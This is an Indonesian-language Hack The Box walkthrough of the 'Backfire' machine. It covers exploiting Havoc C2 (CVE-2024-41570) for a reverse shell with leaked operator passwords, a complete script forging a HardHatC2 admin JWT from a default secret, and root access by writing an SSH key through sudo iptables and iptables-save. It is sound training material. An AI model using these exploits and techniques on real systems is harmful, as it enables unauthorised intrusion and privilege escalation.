Halo semuanya! Disini gw akan kembali membahas salah satu mesin season 7 dari Hack The Box, yaitu Backfire. Mesin ini fokus pada eksploitasi HavocC2 framework yang vulnerable terhadap SSRF to RCE dan privilege escalation menggunakan iptables.
Scanning Awal
Seperti biasa, kita akan mulai dengan melakukan scanning dengan menggunakan nmap:
└─# nmap -sCV 10.10.11.49
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-31 10:39 EST
Nmap scan report for 10.10.11.49
Host is up (0.032s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
|_ 256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
443/tcp open ssl/http nginx 1.22.1
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
|_http-server-header: nginx/1.22.1
| ssl-cert: Subject: commonName=127.0.0.1/organizationName=Cloud Co/stateOrProvinceName=Arizona/countryName=US
| Subject Alternative Name: IP Address:127.0.0.1
| Not valid before: 2024-05-10T04:56:07
|_Not valid after: 2027-05-10T04:56:07
| tls-alpn:
| http/1.1
| http/1.0
|_ http/0.9
4444/tcp filtered krb524
5000/tcp filtered upnp
8000/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 1559 17-Dec-2024 11:31 disable_tls.patch
| 875 17-Dec-2024 11:34 havoc.yaotl
|_
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Dari hasil scanning, kita menemukan beberapa port terbuka:
- Port 22: SSH
- Port 443: HTTPS dengan Nginx
- Port 8000: HTTP dengan Nginx (terdapat 2 file)
- Port 4444 & 5000: Filtered
Enumerasi Web Services
Pada port 8000, kita menemukan dua file menarik:
disable_tls.patchhavoc.yaotl
Analisis File havoc.yaotl
File havoc.yaotl berisi konfigurasi untuk HavocC2 framework:
Teamserver {
Host = "127.0.0.1"
Port = 40056
Build {
Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
Nasm = "/usr/bin/nasm"
}
}
Operators {
user "ilya" {
Password = "CobaltStr1keSuckz!"
}
user "sergej" {
Password = "1w4nt2sw1tch2h4rdh4tc2"
}
}
Demon {
Sleep = 2
Jitter = 15
TrustXForwardedFor = false
Injection {
Spawn64 = "C:\\Windows\\System32\\notepad.exe"
Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
}
}
Listeners {
Http {
Name = "Demon Listener"
Hosts = [
"backfire.htb"
]
HostBind = "127.0.0.1"
PortBind = 8443
PortConn = 8443
HostRotation = "round-robin"
Secure = true
}
}
Dari file ini kita mendapatkan kredensial:
- Username: ilya
- Password: CobaltStr1keSuckz!
- Username: sergej
- Password: 1w4nt2sw1tch2h4rdh4tc2
Analisis File disable_tls.patch
File disable_tls.patch menunjukkan bahwa TLS untuk Websocket management port 40056 telah dinonaktifkan:
Disable TLS for Websocket management port 40056, so I can prove that
sergej is not doing any work
Management port only allows local connections (we use ssh forwarding) so
this will not compromize our teamserver
diff --git a/client/src/Havoc/Connector.cc b/client/src/Havoc/Connector.cc
index abdf1b5..6be76fb 100644
--- a/client/src/Havoc/Connector.cc
+++ b/client/src/Havoc/Connector.cc
@@ -8,12 +8,11 @@ Connector::Connector( Util::ConnectionInfo* ConnectionInfo )
{
Teamserver = ConnectionInfo;
Socket = new QWebSocket();
- auto Server = "wss://" + Teamserver->Host + ":" + this->Teamserver->Port + "/havoc/";
+ auto Server = "ws://" + Teamserver->Host + ":" + this->Teamserver->Port + "/havoc/";
auto SslConf = Socket->sslConfiguration();
/* ignore annoying SSL errors */
SslConf.setPeerVerifyMode( QSslSocket::VerifyNone );
- Socket->setSslConfiguration( SslConf );
Socket->ignoreSslErrors();
QObject::connect( Socket, &QWebSocket::binaryMessageReceived, this, [&]( const QByteArray& Message )
diff --git a/teamserver/cmd/server/teamserver.go b/teamserver/cmd/server/teamserver.go
index 9d1c21f..59d350d 100644
--- a/teamserver/cmd/server/teamserver.go
+++ b/teamserver/cmd/server/teamserver.go
@@ -151,7 +151,7 @@ func (t *Teamserver) Start() {
}
// start the teamserver
- if err = t.Server.Engine.RunTLS(Host+":"+Port, certPath, keyPath); err != nil {
+ if err = t.Server.Engine.Run(Host+":"+Port); err != nil {
logger.Error("Failed to start websocket: " + err.Error())
}
Eksploitasi HavocC2 (CVE-2024-41570)
Setelah penelitian, kita menemukan bahwa HavocC2 memiliki kerentanan SSRF to RCE (CVE-2024-41570). Kita akan menggunakan skrip exploit yang tersedia.
Persiapan Reverse Shell
Kita siapkan listener untuk reverse shell:
└─# nc -lvnp 1234
listening on [any] 1234 ...
Menjalankan Exploit
Kita jalankan script exploit dengan user dan password yang didapat dari file konfiguasi:
└─# python3 e.py -t https://10.10.11.49 -l 10.10.14.103 --c2user ilya --c2pass CobaltStr1keSuckz!
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
28681
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
Mendapatkan Initial Shell & User Flag
ilya@backfire:~/Havoc/payloads/Demon$ whoami
whoami
ilya
ilya@backfire:~$ ls
ls
files
hardhat.txt
Havoc
user.txt
ilya@backfire:~$ cat user.txt
552a1eaea06acf19769ec3b4086bb914
Meningkatkan Akses dengan SSH
Membuat SSH Key
Kita buat SSH key untuk akses yang lebih stabil:
└─# ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa
Generating public/private rsa key pair.
Enter passphrase for "/root/.ssh/id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
Mendapatkan Public Key
└─# cat .ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAA...OpNvAxIgkM4iryYJuCin8Na1skesug/TwCJWvmCCRkmBeVen0yhQIubkQzuucPsIhsmkJtY3WW876hM2ylREkSPe03xOWVI...== root@kali
Menambahkan Public Key ke User ilya
ilya@backfire:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAA...OpNvAxIgkM4iryYJuCin8Na1skesug/TwCJWvmCCRkmBeVen0yhQIubkQzuucPsIhsmkJtY3WW876hM2ylREkSPe03xOWVI...== root@kali" > authorized_keys
Login via SSH
└─# ssh -i /root/.ssh/id_rsa ilya@backfire.htb
Linux backfire 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
Enumerasi Lebih Lanjut
Informasi Tambahan dari hardhat.txt
ilya@backfire:~$ cat hardhat.txt
Sergej said he installed HardHatC2 for testing and not made any changes to the defaults
I hope he prefers Havoc bcoz I don't wanna learn another C2 framework, also Go > C#
Inspeksi Network Services
ilya@backfire:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:7096 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:40056 0.0.0.0:* LISTEN
tcp6 0 0 :::22 :::* LISTEN
udp 0 0 0.0.0.0:68 0.0.0.0:*
Port Forwarding
Kita forward port 5000 dan 7096 untuk mengakses HardHatC2:
└─# ssh -i ~/.ssh/id_rsa ilya@backfire.htb -L 7096:127.0.0.1:7096 -L 5000:127.0.0.1:5000
Eksploitasi HardHatC2
Membuat Admin Token HardHatC2
Kita gunakan script Python untuk membuat JWT token admin dan membuat user baru:
import jwt
import datetime
import uuid
import requests
rhost = '127.0.0.1:5000'
# Craft Admin JWT
secret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq"
issuer = "hardhatc2.com"
now = datetime.datetime.utcnow()
expiration = now + datetime.timedelta(days=28)
payload = {
"sub": "HardHat_Admin",
"jti": str(uuid.uuid4()),
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1",
"iss": issuer,
"aud": issuer,
"iat": int(now.timestamp()),
"exp": int(expiration.timestamp()),
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator"
}
token = jwt.encode(payload, secret, algorithm="HS256")
print("Generated JWT:")
print(token)
# Use Admin JWT to create a new user 'sth_pentest' as TeamLead
burp0_url = f"https://{rhost}/Login/Register"
burp0_headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
}
burp0_json = {
"password": "sth_pentest",
"role": "TeamLead",
"username": "sth_pentest"
}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
print(r.text)
Access HardHatC2 Console
Setelah berhasil membuat user, kita bisa mengakses HardHatC2 console di https://127.0.0.1:7096 dengan kredensial yang baru dibuat.
Implant Terminal Access
Melalui menu Implant Interact > Terminal, kita menambahkan SSH key kita ke user sergej:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAA...JFdwoX2p99mp0TzvLElli7BcmW+pzSR7nnoe6/Q7l/cK2MoUQ9ZbXdeg0xIqDMe4xejytWrqoYw4VUeneFARc01KLdHT+1fv4N7k4R9ohCQsfCRgiq0l1tfUCV+AtEWYWCFSpCyGctqtLn750toe8qgSdSpGEmO90tly4rihUNrUw== root@kali" | tee -a ~/.ssh/authorized_keys
Mendapatkan Akses ke User sergej
└─# ssh -i ~/.ssh/id_rsa sergej@backfire.htb
Linux backfire 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
sergej@backfire:~$ whoami
sergej
Privilege Escalation ke Root
Cek Sudo Privileges
sergej@backfire:~$ sudo -l
Matching Defaults entries for sergej on backfire:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User sergej may run the following commands on backfire:
(root) NOPASSWD: /usr/sbin/iptables
(root) NOPASSWD: /usr/sbin/iptables-save
Exploitasi iptables
Kita memanfaatkan kemampuan sudo pada iptables untuk menulis ke authorized_keys root:
- Membuat rule iptables dengan SSH key kita dalam comment:
sergej@backfire:~$ sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\n YOU SSH PUB \n'
- Melihat rule yang dibuat:
sergej@backfire:~$ sudo iptables -S
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 5000 -j ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 5000 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 5000 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT
-A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 7096 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 7096 -j REJECT --reject-with icmp-port-unreachable
-A INPUT -i lo -m comment --comment "
" -j ACCEPT
- Menyimpan rules ke file authorized_keys root:
sergej@backfire:~$ sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
Membuat ED25519 Key
└─# ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519):
Enter passphrase for "/root/.ssh/id_ed25519" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_ed25519
Your public key has been saved in /root/.ssh/id_ed25519.pub
Login sebagai Root dan Mendapatkan Root Flag
└─# ssh -i ~/.ssh/id_ed25519 root@10.10.11.49
Linux backfire 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
root@backfire:~# whoami
root
root@backfire:~# cat root.txt
ad3cd8f586278be5dbf03e3ccc925599
Kesimpulan
Mesin Backfire memperlihatkan beberapa vektor serangan yang menarik:
- HavocC2 SSRF to RCE – Eksploitasi CVE-2024-41570 untuk mendapatkan initial foothold
- HardHatC2 JWT Exploitation – Pembuatan token admin untuk mengakses HardHatC2 console
- iptables Privilege Escalation – Memanfaatkan sudo iptables untuk menulis ke authorized_keys root
Attack Path Summary
HavocC2 SSRF → User ilya → HardHatC2 Exploitation → User sergej → iptables Privilege Escalation → Root